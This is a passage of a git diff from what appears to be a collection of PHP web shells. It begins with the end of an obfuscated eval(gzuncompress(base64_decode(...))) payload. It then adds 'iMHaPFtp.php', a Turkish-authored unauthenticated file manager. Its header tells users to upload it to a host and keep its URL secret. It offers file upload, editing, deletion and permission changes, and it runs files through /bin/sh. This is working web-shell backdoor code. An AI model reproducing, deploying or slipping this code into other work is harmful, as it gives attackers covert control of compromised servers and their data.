J3q8qTnPBvtAyqOegZT3xMywTMWU4MT77R+Jk6C12SpQVdSBIqaikvRoACRGm3FXl/LwLcNwQXLSHPXYDxCPleCbTG1I5tMTc6kxx1DzjKJyKHumzVe3YMez+FcFwtgbl7dk7VmTyeb+zjCseimzb3QWldP30dT/D8+1rVv2EFc7OxFp6UXgnb3cPy/G0k6TFGJatQeh8uIsJ2DVQb5vKhJz9+VGfXKd53ZEdRtin4XhmaCeC2OaIcmx8jyWu0ExMtCMJTQytuL8f/en+uitPDMbAN7auCnON2Hzmy4RfHuu3KM4HniC1QGTjUufyvmbTt5gCK2WorHsBy0R8whlLHyxZ4+wdXPYnKLCrhkSzCOmptlautohudzhf4OVZ4yhI9RB8xZsfJ2sPDp7/AnfMeiY6Tf4ZeliKFCNVdm/Z4BkfCDu8z+IeNintB2b6pWk8FQzCHKH58wek3+P7cl8tA4XtrWxq1LXCo4dZTpurEKDglYhNlLHwkQrxLys292OMUPLBme77z3TED+dBu31NXqykxkh57CKkhFzVRy6Zqzg/yyPasbdFZCphlL47D5v5kzDtsouQ==';eval(gzuncompress(base64_decode('eNpdUGFrwjAQ/SslZLRFpHPMfdCkFfYDJsxvY5PYnGshTbIm1bnS/76LVZj7csl7vHvv7qhVfOV8q0An1ArneO0c+IRu1y+vm7c4UPF7WjRy/p9bJLfSSrgqSG/xInTGcZqmS/onSvKdcPD0uJVQGglIoGBv2oRqfr+kmlGFdTJJeyp7qgdeVm1iWpmMMP04/8MkCO+oVQP2D/U+OK8+fzpdmsa24NzZuYeDUAkpcipZQVAIykFf5KzyjcIKQuasAS+iyns7ha+uPnDybLQH7aebkwUSlSPixMO3z0LjMior0eIJ+LHW0hzddPYwn5Gc+doryNc43BHHZNmIWTbm7Iw85axEL2hzhjs3EUZXRnISDof9tbadjzzGcmIvLiTSorlgEmW3Itftmtqf6SwY4nP1z8a4bNy0GH4BG4Kl3A==')));?>
\ No newline at end of file
diff --git a/xakep-shells/PHP/iMHaPFtp.php.php.txt b/xakep-shells/PHP/iMHaPFtp.php.php.txt
new file mode 100644
index 0000000..2c003b7
--- /dev/null
+++ b/xakep-shells/PHP/iMHaPFtp.php.php.txt
@@ -0,0 +1,2061 @@
+<?php
+/*
+ * iMHaPFTP.php - iMHaBiRLiGi Php Ftp Editoru
+ * Copyright (C) 2003-2005  iMHaBiRLiGi <iMHaBiRLiGi@imhabirligi.com>
+ *
+ * Bu Kod Tamamiyle Özgür Yazilimdir.
+ * Kötü Amaclar ile kullanilmamak sartiyla istenildigi gibi Kullanilabilir
+ * Programin amaci ftp olmadan hostunuza baglanti kurup 
+ * Dosya ekleyip kaldira bilmektir.
+ * Kodumuz 6 Dilde yazilmistir.Server Diline Göre Otomatik Secim Yapar.
+ * -------------------------------------------------------------------------
+ * Kodu hosta attiktan sonra adres cubuguna kodun uzantisini verip baglanin
+ * Ve Asla kimseye bu kodun uzantisini vermeyiniz.!!
+ * -------------------------------------------------------------------------
+ *
+ * iMHaBiRLiGi PhpFtp V1.1
+ * =========================================================================
+ *
+ * BeweiS
+ * <BeweiS@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * MicroP_
+ * <MicroP_@imhabirligi.com>
+ *    iMHaBiRLiGi Administrator
+ *    Php-Asp-Programlama ve Güvenlik
+ *
+ * Libertical
+ * <libertical@imhabirligi.com>
+ *    iMHaBiRLiGi Yönetim
+ *    C++, Delphi,Programlama ve Linux Hastasi
+ *
+ * PowerGhost
+ * <powerghost@imhabirligi.com>
+ *    iMHaBiRLiGi Sistem Danismani
+ *    Sistem Danismani
+ *    
+ *  BadSector
+ *  ozgurkaleli@yahoo.com
+ *  iMHaBiRLiGi Yönetim
+ *   VicualBasic-Delphi Programlama
+ *   Sistemdanismani ve Linux Hastasi
+ *
+ * Bu kodun yaziliminda ismi gecen her arkadasimizin
+ * Katkilari bulunmustur.
+ * Herbiri ilgi alaninda Basarili olduklari konularda kodumuzu gelistirmemize
+ * Katkida bulunmuslardir.
+ * NOT: Kod Hakkinda takildiniz konulari iMHaBiRLiGi Forumlarina Sora bilirsiniz
+ * http://www.imhabirligi.com
+ *<iMHaBiRLiGi@imhabirligi.com>
+/* ------------------------------------------------------------------------- */
+
+/* Diller :
+ * 'en' - English
+ * 'de' - German
+ * 'fr' - French
+ * 'it' - Italian
+ * 'se' - Swedish
+ * 'auto' - autoselect
+ */
+$lang = 'auto';
+
+/* Charset of your filenames:
+ */
+$charset = 'ISO-8859-1';
+
+/* Homedir:
+ * For example: './' - the script's directory
+ */
+$homedir = './';
+
+/* Size of the Düzenle textarea
+ */
+$Düzenlecols = 80;
+$Düzenlerows = 25;
+
+/* -------------------------------------------
+ * Optional configuration (reTasi # to enable)
+ */
+
+/* Permission of created directories:
+ * For example: 0705 would be 'drwx---r-x'.
+ */
+# $dirpermission = 0705;
+
+/* Permission of created files:
+ * For example: 0604 would be '-rw----r--'.
+ */
+# $filepermission = 0604;
+
+/* Filenames related to the apache web server:
+ */
+$htaccess = '.htaccess';
+$htpasswd = '.htpasswd';
+
+/* ------------------------------------------------------------------------- */
+
+if (get_magic_quotes_gpc()) {
+	array_walk($_GET, 'strip');
+	array_walk($_POST, 'strip');
+	array_walk($_REQUEST, 'strip');
+}
+
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+$delim = DIRECTORY_SEPARATOR;
+
+if (function_exists('php_uname')) {
+	$win = (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') ? true : false;
+} else {
+	$win = ($delim == '\\') ? true : false;
+}
+
+if (!empty($_SERVER['PATH_TRANSLATED'])) {
+	$scriptdir = dirname($_SERVER['PATH_TRANSLATED']);
+} elseif (!empty($_SERVER['SCRIPT_FILENAME'])) {
+	$scriptdir = dirname($_SERVER['SCRIPT_FILENAME']);
+} elseif (function_exists('getcwd')) {
+	$scriptdir = getcwd();
+} else {
+	$scriptdir = '.';
+}
+$homedir = relative2absolute($homedir, $scriptdir);
+
+$dir = (array_key_exists('dir', $_REQUEST)) ? $_REQUEST['dir'] : $homedir;
+
+if (array_key_exists('olddir', $_POST) && !path_is_relative($_POST['olddir'])) {
+	$dir = relative2absolute($dir, $_POST['olddir']);
+}
+
+$directory = simplify_path(addslash($dir));
+
+$files = array();
+$action = '';
+if (!empty($_POST['submit_all'])) {
+	$action = $_POST['action_all'];
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("checked$i", $_POST) && $_POST["checked$i"] == 'true') {
+			$files[] = $_POST["file$i"];
+		}
+	}
+} elseif (!empty($_REQUEST['action'])) {
+	$action = $_REQUEST['action'];
+	$files[] = relative2absolute($_REQUEST['file'], $directory);
+} elseif (!empty($_POST['submit_upload']) && !empty($_FILES['upload']['name'])) {
+	$files[] = $_FILES['upload'];
+	$action = 'upload';
+} elseif (array_key_exists('num', $_POST)) {
+	for ($i = 0; $i < $_POST['num']; $i++) {
+		if (array_key_exists("submit$i", $_POST)) break;
+	}
+	if ($i < $_POST['num']) {
+		$action = $_POST["action$i"];
+		$files[] = $_POST["file$i"];
+	}
+}
+if (empty($action) && (!empty($_POST['submit_create']) || (array_key_exists('focus', $_POST) && $_POST['focus'] == 'create')) && !empty($_POST['create_name'])) {
+	$files[] = relative2absolute($_POST['create_name'], $directory);
+	switch ($_POST['create_type']) {
+	case 'directory':
+		$action = 'create_directory';
+		break;
+	case 'file':
+		$action = 'create_file';
+	}
+}
+if (sizeof($files) == 0) $action = ''; else $file = reset($files);
+
+if ($lang == 'auto') {
+	if (array_key_exists('HTTP_ACCEPT_LANGUAGE', $_SERVER) && strlen($_SERVER['HTTP_ACCEPT_LANGUAGE']) >= 2) {
+		$lang = substr($_SERVER['HTTP_ACCEPT_LANGUAGE'], 0, 2);
+	} else {
+		$lang = 'en';
+	}
+}
+
+$words = getwords($lang);
+
+$cols = ($win) ? 4 : 7;
+
+if (!isset($dirpermission)) {
+	$dirpermission = (function_exists('umask')) ? (0777 & ~umask()) : 0755;
+}
+if (!isset($filepermission)) {
+	$filepermission = (function_exists('umask')) ? (0666 & ~umask()) : 0644;
+}
+
+if (!empty($_SERVER['SCRIPT_NAME'])) {
+	$self = html(basename($_SERVER['SCRIPT_NAME']));
+} elseif (!empty($_SERVER['PHP_SELF'])) {
+	$self = html(basename($_SERVER['PHP_SELF']));
+} else {
+	$self = '';
+}
+
+if (!empty($_SERVER['SERVER_SOFTWARE'])) {
+	if (strtolower(substr($_SERVER['SERVER_SOFTWARE'], 0, 6)) == 'apache') {
+		$apache = true;
+	} else {
+		$apache = false;
+	}
+} else {
+	$apache = true;
+}
+
+switch ($action) {
+
+case 'view':
+
+	if (is_script($file)) {
+
+		/* highlight_file is a mess! */
+		ob_start();
+		highlight_file($file);
+		$src = ereg_replace('<font color="([^"]*)">', '<span style="color: \1">', ob_get_contents());
+		$src = str_replace(array('</font>', "\r", "\n"), array('</span>', '', ''), $src);
+		ob_end_clean();
+
+		html_header();
+		echo '<h2 style="text-align: left; margin-bottom: 0">' . html($file) . '</h2>
+
+<hr />
+
+<table>
+<tr>
+<td style="text-align: right; vertical-align: top; color: gray; padding-right: 3pt; border-right: 1px solid gray">
+<pre style="margin-top: 0"><code>';
+
+		for ($i = 1; $i <= sizeof(file($file)); $i++) echo "$i\n";
+
+		echo '</code></pre>
+</td>
+<td style="text-align: left; vertical-align: top; padding-left: 3pt">
+<pre style="margin-top: 0">' . $src . '</pre>
+</td>
+</tr>
+</table>
+
+';
+
+		html_footer();
+
+	} else {
+
+		header('Content-Type: ' . getmimetype($file));
+		header('Content-Disposition: filename=' . basename($file));
+
+		readfile($file);
+
+	}
+
+	break;
+
+case 'indir':
+
+	header('Pragma: public');
+	header('Expires: 0');
+	header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
+	header('Content-Type: ' . getmimetype($file));
+	header('Content-Disposition: attachment; filename=' . basename($file) . ';');
+	header('Content-Length: ' . filesize($file));
+
+	readfile($file);
+
+	break;
+
+case 'upload':
+
+	$dest = relative2absolute($file['name'], $directory);
+
+	if (@file_exists($dest)) {
+		listing_page(error('already_exists', $dest));
+	} elseif (@Tasi_uploaded_file($file['tmp_name'], $dest)) {
+		listing_page(notice('uploaded', $file['name']));
+	} else {
+		listing_page(error('not_uploaded', $file['name']));
+	}
+
+	break;
+
+case 'create_directory':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$dirpermission);
+		if (@mkdir($file, $dirpermission)) {
+			listing_page(notice('created', $file));
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'create_file':
+
+	if (@file_exists($file)) {
+		listing_page(error('already_exists', $file));
+	} else {
+		$old = @umask(0777 & ~$filepermission);
+		if (@touch($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_created', $file));
+		}
+		@umask($old);
+	}
+
+	break;
+
+case 'execute':
+
+	chdir(dirname($file));
+
+	$output = array();
+	$retval = 0;
+	exec('echo "./' . basename($file) . '" | /bin/sh', $output, $retval);
+
+	$error = ($retval == 0) ? false : true;
+
+	if (sizeof($output) == 0) $output = array('<' . $words['no_output'] . '>');
+
+	if ($error) {
+		listing_page(error('not_executed', $file, implode("\n", $output)));
+	} else {
+		listing_page(notice('executed', $file, implode("\n", $output)));
+	}
+
+	break;
+
+case 'Sil':
+
+	if (!empty($_POST['no'])) {
+		listing_page();
+	} elseif (!empty($_POST['yes'])) {
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			if (del($file)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Sild', implode("\n", $failure));
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Sild', implode("\n", $success));
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('really_Sil') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	<input type="submit" name="no" value="' . word('no') . '" id="red_button" />
+	<input type="submit" name="yes" value="' . word('yes') . '" id="green_button" style="margin-left: 50px" />
+</td>
+</tr>
+</table>
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Degistir':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (!@file_exists($dest) && @Degistir($file, $dest)) {
+			listing_page(notice('Degistird', $file, $dest));
+		} else {
+			listing_page(error('not_Degistird', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+	<input type="hidden" name="action" value="Degistir" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+	<b>' . word('Degistir_file') . '</b>
+	<p>' . html($file) . '</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($file) . '" value="' . html($file) . '" />
+	<input type="submit" value="' . word('Degistir') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Tasi':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		$failure = array();
+		$success = array();
+
+		foreach ($files as $file) {
+			$filename = substr($file, strlen($directory));
+			$d = $dest . $filename;
+			if (!@file_exists($d) && @Degistir($file, $d)) {
+				$success[] = $file;
+			} else {
+				$failure[] = $file;
+			}
+		}
+
+		$message = '';
+		if (sizeof($failure) > 0) {
+			$message = error('not_Tasid', implode("\n", $failure), $dest);
+		}
+		if (sizeof($success) > 0) {
+			$message .= notice('Tasid', implode("\n", $success), $dest);
+		}
+
+		listing_page($message);
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\t<b>" . word('Tasi_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Tasi') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Kopyala':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (@is_dir($dest)) {
+
+			$failure = array();
+			$success = array();
+
+			foreach ($files as $file) {
+				$filename = substr($file, strlen($directory));
+				$d = addslash($dest) . $filename;
+				if (!@is_dir($file) && !@file_exists($d) && @Kopyala($file, $d)) {
+					$success[] = $file;
+				} else {
+					$failure[] = $file;
+				}
+			}
+
+			$message = '';
+			if (sizeof($failure) > 0) {
+				$message = error('not_copied', implode("\n", $failure), $dest);
+			}
+			if (sizeof($success) > 0) {
+				$message .= notice('copied', implode("\n", $success), $dest);
+			}
+
+			listing_page($message);
+
+		} else {
+
+			if (!@file_exists($dest) && @Kopyala($file, $dest)) {
+				listing_page(notice('copied', $file, $dest));
+			} else {
+				listing_page(error('not_copied', $file, $dest));
+			}
+
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+';
+
+		request_dump();
+
+		echo "\n<b>" . word('Kopyala_files') . '</b>
+	<p>
+';
+
+		foreach ($files as $file) {
+			echo "\t" . html($file) . "<br />\n";
+		}
+
+		echo '	</p>
+	<hr />
+	' . word('Yol') . ':
+	<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+	<input type="submit" value="' . word('Kopyala') . '" />
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'create_symlink':
+
+	if (!empty($_POST['Yol'])) {
+
+		$dest = relative2absolute($_POST['Yol'], $directory);
+
+		if (substr($dest, -1, 1) == $delim) $dest .= basename($file);
+
+		if (!empty($_POST['relative'])) $file = absolute2relative(addslash(dirname($dest)), $file);
+
+		if (!@file_exists($dest) && @symlink($file, $dest)) {
+			listing_page(notice('symlinked', $file, $dest));
+		} else {
+			listing_page(error('not_symlinked', $file, $dest));
+		}
+
+	} else {
+
+		html_header();
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog" id="symlink">
+<tr>
+	<td style="vertical-align: top">' . word('Yol') . ': </td>
+	<td>
+		<b>' . html($file) . '</b><br />
+		<input type="checkbox" name="relative" value="yes" id="checkbox_relative" checked="checked" style="margin-top: 1ex" />
+		<label for="checkbox_relative">' . word('relative') . '</label>
+		<input type="hidden" name="action" value="create_symlink" />
+		<input type="hidden" name="file" value="' . html($file) . '" />
+		<input type="hidden" name="dir" value="' . html($directory) . '" />
+	</td>
+</tr>
+<tr>
+	<td>' . word('symlink') . ': </td>
+	<td>
+		<input type="text" name="Yol" size="' . textfieldsize($directory) . '" value="' . html($directory) . '" />
+		<input type="submit" value="' . word('create_symlink') . '" />
+	</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+case 'Düzenle':
+
+	if (!empty($_POST['save'])) {
+
+		$content = str_replace("\r\n", "\n", $_POST['content']);
+
+		if (($f = @fopen($file, 'w')) && @fwrite($f, $content) !== false && @fclose($f)) {
+			listing_page(notice('saved', $file));
+		} else {
+			listing_page(error('not_saved', $file));
+		}
+
+	} else {
+
+		if (@is_readable($file) && @is_writable($file)) {
+			Düzenle($file);
+		} else {
+			listing_page(error('not_Düzenleed', $file));
+		}
+
+	}
+
+	break;
+
+case 'permission':
+
+	if (!empty($_POST['set'])) {
+
+		$mode = 0;
+		if (!empty($_POST['ur'])) $mode |= 0400; if (!empty($_POST['uw'])) $mode |= 0200; if (!empty($_POST['ux'])) $mode |= 0100;
+		if (!empty($_POST['gr'])) $mode |= 0040; if (!empty($_POST['gw'])) $mode |= 0020; if (!empty($_POST['gx'])) $mode |= 0010;
+		if (!empty($_POST['or'])) $mode |= 0004; if (!empty($_POST['ow'])) $mode |= 0002; if (!empty($_POST['ox'])) $mode |= 0001;
+
+		if (@chmod($file, $mode)) {
+			listing_page(notice('permission_set', $file, decoct($mode)));
+		} else {
+			listing_page(error('permission_not_set', $file, decoct($mode)));
+		}
+
+	} else {
+
+		html_header();
+
+		$mode = fileperms($file);
+
+		echo '<form action="' . $self . '" method="post">
+
+<table class="dialog">
+<tr>
+<td class="dialog">
+
+	<p style="margin: 0">' . phrase('permission_for', $file) . '</p>
+
+	<hr />
+
+	<table id="permission">
+	<tr>
+		<td></td>
+		<td style="border-right: 1px solid black">' . word('owner') . '</td>
+		<td style="border-right: 1px solid black">' . word('group') . '</td>
+		<td>' . word('other') . '</td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('read') . ':</td>
+		<td><input type="checkbox" name="ur" value="1"'; if ($mode & 00400) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gr" value="1"'; if ($mode & 00040) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="or" value="1"'; if ($mode & 00004) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('write') . ':</td>
+		<td><input type="checkbox" name="uw" value="1"'; if ($mode & 00200) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gw" value="1"'; if ($mode & 00020) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ow" value="1"'; if ($mode & 00002) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	<tr>
+		<td style="text-align: right">' . word('execute') . ':</td>
+		<td><input type="checkbox" name="ux" value="1"'; if ($mode & 00100) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="gx" value="1"'; if ($mode & 00010) echo ' checked="checked"'; echo ' /></td>
+		<td><input type="checkbox" name="ox" value="1"'; if ($mode & 00001) echo ' checked="checked"'; echo ' /></td>
+	</tr>
+	</table>
+
+	<hr />
+
+	<input type="submit" name="set" value="' . word('set') . '" />
+
+	<input type="hidden" name="action" value="permission" />
+	<input type="hidden" name="file" value="' . html($file) . '" />
+	<input type="hidden" name="dir" value="' . html($directory) . '" />
+
+</td>
+</tr>
+</table>
+
+<p><a href="' . $self . '?dir=' . urlencode($directory) . '">[ ' . word('Geri') . ' ]</a></p>
+
+</form>
+
+';
+
+		html_footer();
+
+	}
+
+	break;
+
+default:
+
+	listing_page();
+
+}
+
+/* ------------------------------------------------------------------------- */
+
+function getlist ($directory) {
+	global $delim, $win;
+
+	if ($d = @opendir($directory)) {
+
+		while (($filename = @readdir($d)) !== false) {
+
+			$path = $directory . $filename;
+
+			if ($stat = @lstat($path)) {
+
+				$file = array(
+					'filename'    => $filename,
+					'path'        => $path,
+					'is_file'     => @is_file($path),
+					'is_dir'      => @is_dir($path),
+					'is_link'     => @is_link($path),
+					'is_readable' => @is_readable($path),
+					'is_writable' => @is_writable($path),
+					'size'        => $stat['size'],
+					'permission'  => $stat['mode'],
+					'owner'       => $stat['uid'],
+					'group'       => $stat['gid'],
+					'mtime'       => @filemtime($path),
+					'atime'       => @fileatime($path),
+					'ctime'       => @filectime($path)
+				);
+
+				if ($file['is_dir']) {
+					$file['is_executable'] = @file_exists($path . $delim . '.');
+				} else {
+					if (!$win) {
+						$file['is_executable'] = @is_executable($path);
+					} else {
+						$file['is_executable'] = true;
+					}
+				}
+
+				if ($file['is_link']) $file['target'] = @readlink($path);
+
+				if (function_exists('posix_getpwuid')) $file['owner_name'] = @reset(posix_getpwuid($file['owner']));
+				if (function_exists('posix_getgrgid')) $file['group_name'] = @reset(posix_getgrgid($file['group']));
+
+				$files[] = $file;
+
+			}
+
+		}
+
+		return $files;
+
+	} else {
+		return false;
+	}
+
+}
+
+function sortlist (&$list, $key, $reverse) {
+
+	quicksort($list, 0, sizeof($list) - 1, $key);
+
+	if ($reverse) $list = array_reverse($list);
+
+}
+
+function quicksort (&$array, $first, $last, $key) {
+
+	if ($first < $last) {
+
+		$cmp = $array[floor(($first + $last) / 2)][$key];
+
+		$l = $first;
+		$r = $last;
+
+		while ($l <= $r) {
+
+			while ($array[$l][$key] < $cmp) $l++;
+			while ($array[$r][$key] > $cmp) $r--;
+
+			if ($l <= $r) {
+
+				$tmp = $array[$l];
+				$array[$l] = $array[$r];
+				$array[$r] = $tmp;
+
+				$l++;
+				$r--;
+
+			}
+
+		}
+
+		quicksort($array, $first, $r, $key);
+		quicksort($array, $l, $last, $key);
+
+	}
+
+}
+
+function permission_octal2string ($mode) {
+
+	if (($mode & 0xC000) === 0xC000) {
+		$type = 's';
+	} elseif (($mode & 0xA000) === 0xA000) {
+		$type = 'l';
+	} elseif (($mode & 0x8000) === 0x8000) {
+		$type = '-';
+	} elseif (($mode & 0x6000) === 0x6000) {
+		$type = 'b';
+	} elseif (($mode & 0x4000) === 0x4000) {
+		$type = 'd';
+	} elseif (($mode & 0x2000) === 0x2000) {
+		$type = 'c';
+	} elseif (($mode & 0x1000) === 0x1000) {
+		$type = 'p';
+	} else {
+		$type = '?';
+	}
+
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) {
+		$owner .= ($mode & 00100) ? 's' : 'S';
+	} else {
+		$owner .= ($mode & 00100) ? 'x' : '-';
+	}
+
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) {
+		$group .= ($mode & 00010) ? 's' : 'S';
+	} else {
+		$group .= ($mode & 00010) ? 'x' : '-';
+	}
+
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) {
+		$other .= ($mode & 00001) ? 't' : 'T';
+	} else {
+		$other .= ($mode & 00001) ? 'x' : '-';
+	}
+
+	return $type . $owner . $group . $other;
+
+}
+
+function is_script ($filename) {
+	return ereg('\.php$|\.php3$|\.php4$|\.php5$', $filename);
+}
+
+function getmimetype ($filename) {
+	static $mimes = array(
+		'\.jpg$|\.jpeg$'  => 'image/jpeg',
+		'\.gif$'          => 'image/gif',
+		'\.png$'          => 'image/png',
+		'\.html$|\.html$' => 'text/html',
+		'\.txt$|\.asc$'   => 'text/plain',
+		'\.xml$|\.xsl$'   => 'application/xml',
+		'\.pdf$'          => 'application/pdf'
+	);
+
+	foreach ($mimes as $regex => $mime) {
+		if (eregi($regex, $filename)) return $mime;
+	}
+
+	// return 'application/octet-stream';
+	return 'text/plain';
+
+}
+
+function del ($file) {
+	global $delim;
+
+	if (!@is_link($file) && !file_exists($file)) return false;
+
+	if (!@is_link($file) && @is_dir($file)) {
+
+		if ($dir = @opendir($file)) {
+
+			$error = false;
+
+			while (($f = readdir($dir)) !== false) {
+				if ($f != '.' && $f != '..' && !del($file . $delim . $f)) {
+					$error = true;
+				}
+			}
+			closedir($dir);
+
+			if (!$error) return @rmdir($file);
+
+			return !$error;
+
+		} else {
+			return false;
+		}
+
+	} else {
+		return @unlink($file);
+	}
+
+}
+
+function addslash ($directory) {
+	global $delim;
+
+	if (substr($directory, -1, 1) != $delim) {
+		return $directory . $delim;
+	} else {
+		return $directory;
+	}
+
+}
+
+function relative2absolute ($string, $directory) {
+
+	if (path_is_relative($string)) {
+		return simplify_path(addslash($directory) . $string);
+	} else {
+		return simplify_path($string);
+	}
+
+}
+
+function path_is_relative ($path) {
+	global $win;
+
+	if ($win) {
+		return (substr($path, 1, 1) != ':');
+	} else {
+		return (substr($path, 0, 1) != '/');
+	}
+
+}
+
+function absolute2relative ($directory, $target) {
+	global $delim;
+
+	$path = '';
+	while ($directory != $target) {
+		if ($directory == substr($target, 0, strlen($directory))) {
+			$path .= substr($target, strlen($directory));
+			break;
+		} else {
+			$path .= '..' . $delim;
+			$directory = substr($directory, 0, strrpos(substr($directory, 0, -1), $delim) + 1);
+		}
+	}
+	if ($path == '') $path = '.';
+
+	return $path;
+
+}
+
+function simplify_path ($path) {
+	global $delim;
+
+	if (@file_exists($path) && function_exists('realpath') && @realpath($path) != '') {
+		$path = realpath($path);
+		if (@is_dir($path)) {
+			return addslash($path);
+		} else {
+			return $path;
+		}
+	}
+
+	$pattern  = $delim . '.' . $delim;
+
+	if (@is_dir($path)) {
+		$path = addslash($path);
+	}
+
+	while (strpos($path, $pattern) !== false) {
+		$path = str_replace($pattern, $delim, $path);
+	}
+
+	$e = addslashes($delim);
+	$regex = $e . '((\.[^\.' . $e . '][^' . $e . ']*)|(\.\.[^' . $e . ']+)|([^\.][^' . $e . ']*))' . $e . '\.\.' . $e;
+
+	while (ereg($regex, $path)) {
+		$path = ereg_replace($regex, $delim, $path);
+	}
+	
+	return $path;
+
+}
+
+function human_filesize ($filesize) {
+
+	$suffices = 'kMGTPE';
+
+	$n = 0;
+	while ($filesize >= 1000) {
+		$filesize /= 1024;
+		$n++;
+	}
+
+	$filesize = round($filesize, 3 - strpos($filesize, '.'));
+
+	if (strpos($filesize, '.') !== false) {
+		while (in_array(substr($filesize, -1, 1), array('0', '.'))) {
+			$filesize = substr($filesize, 0, strlen($filesize) - 1);
+		}
+	}
+
+	$suffix = (($n == 0) ? '' : substr($suffices, $n - 1, 1));
+
+	return $filesize . " {$suffix}B";
+
+}
+
+function strip (&$str) {
+	$str = stripslashes($str);
+}
+
+/* ------------------------------------------------------------------------- */
+
+function listing_page ($message = null) {
+	global $self, $directory, $sort, $reverse;
+
+	html_header();
+
+	$list = getlist($directory);
+
+	if (array_key_exists('sort', $_GET)) $sort = $_GET['sort']; else $sort = 'filename';
+	if (array_key_exists('reverse', $_GET) && $_GET['reverse'] == 'true') $reverse = true; else $reverse = false;
+
+	sortlist($list, $sort, $reverse);
+
+	echo '<h1 style="margin-bottom: 0">iMHaBiRLiGi Php FTP</h1>
+
+<form enctype="multipart/form-data" action="' . $self . '" method="post">
+
+<table id="main">
+';
+
+	directory_choice();
+
+	if (!empty($message)) {
+		spacer();
+		echo $message;
+	}
+
+	if (@is_writable($directory)) {
+		upload_box();
+		create_box();
+	} else {
+		spacer();
+	}
+
+	if ($list) {
+		listing($list);
+	} else {
+		echo error('not_readable', $directory);
+	}
+
+	echo '</table>
+
+</form>
+
+';
+
+	html_footer();
+
+}
+
+function listing ($list) {
+	global $directory, $homedir, $sort, $reverse, $win, $cols, $date_format, $self;
+
+	echo '<tr class="listing">
+	<th style="text-align: center; vertical-align: middle"><img src="' . $self . '?image=smiley" alt="smiley" /></th>
+';
+
+	$d = 'dir=' . urlencode($directory) . '&amp;';
+
+	if (!$reverse && $sort == 'filename') $r = '&amp;reverse=true'; else $r = '';
+	echo "\t<th class=\"filename\"><a href=\"$self?{$d}sort=filename$r\">" . word('filename') . "</a></th>\n";
+
